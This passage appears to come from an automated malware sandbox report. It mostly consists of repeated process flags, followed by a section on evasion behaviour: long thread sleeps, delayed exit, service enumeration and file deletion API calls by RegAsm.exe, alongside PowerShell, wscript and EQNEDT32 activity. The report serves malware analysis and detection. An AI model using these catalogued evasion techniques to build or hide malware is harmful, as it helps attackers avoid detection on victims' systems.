Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0040F6F5 Sleep,ExitProcess,

12_2_0040F6F5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

12_2_0041A696

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 596334	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1901	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1281	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2216	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7628	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3474	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9522	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: foregroundWindowGot 1656	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1884	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3128	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3316	Thread sleep count: 2216 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3316	Thread sleep count: 7628 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3352	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356	Thread sleep time: -596334s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480	Thread sleep count: 3474 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480	Thread sleep count: 482 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3516	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3516	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3492	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3560	Thread sleep count: 75 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3560	Thread sleep time: -37500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3568	Thread sleep count: 243 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3568	Thread sleep time: -729000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3636	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3568	Thread sleep count: 9522 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3568	Thread sleep time: -28566000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041C1DF FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	12_2_0041C1DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	12_2_0040C29B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	12_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0044E739 FindFirstFileExA,	12_2_0044E739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	12_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,	12_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00419A43 FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00419A43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040BA7E
